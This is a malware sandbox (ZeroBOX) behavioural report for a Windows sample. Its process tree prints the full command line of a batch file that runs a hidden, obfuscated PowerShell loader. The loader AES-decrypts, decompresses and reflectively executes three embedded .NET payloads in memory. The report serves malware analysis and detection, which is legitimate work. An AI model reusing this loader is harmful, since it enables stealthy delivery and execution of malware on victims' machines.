popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "oyPdULEA" C:\Users\test22\AppData\Local\Temp\lpg.cmd

    3004

    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\lpg.cmd

      2172

      • cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('xkyHsUEz3I6ELu2lR0z7m6Kw05wb28L/CX73bVCU13U='); $aes_var.IV=[System.Convert]::FromBase64String('/jm5YEgLEZRhB2OjwCSNTQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$nShDB=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$qhgjI=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$CCizP=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($nShDB, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $CCizP.CopyTo($qhgjI); $CCizP.Dispose(); $nShDB.Dispose(); $qhgjI.Dispose(); $qhgjI.ToArray();}function execute_function($param_var,$param2_var){ IEX '$FvEfJ=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$fCCPt=$FvEfJ.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$fCCPt.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$bqfmX = 'C:\Users\test22\AppData\Local\Temp\lpg.cmd';$host.UI.RawUI.WindowTitle = $bqfmX;$ZowMM=[System.IO.File]::ReadAllText($bqfmX).Split([Environment]::NewLine);foreach ($WJela in $ZowMM) { if ($WJela.StartsWith('THuwPURqSTjmbbqbMgKM')) { $jeKym=$WJela.Substring(20); break; }}$payloads_var=[string[]]$jeKym.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "

        2160

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

        2344

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf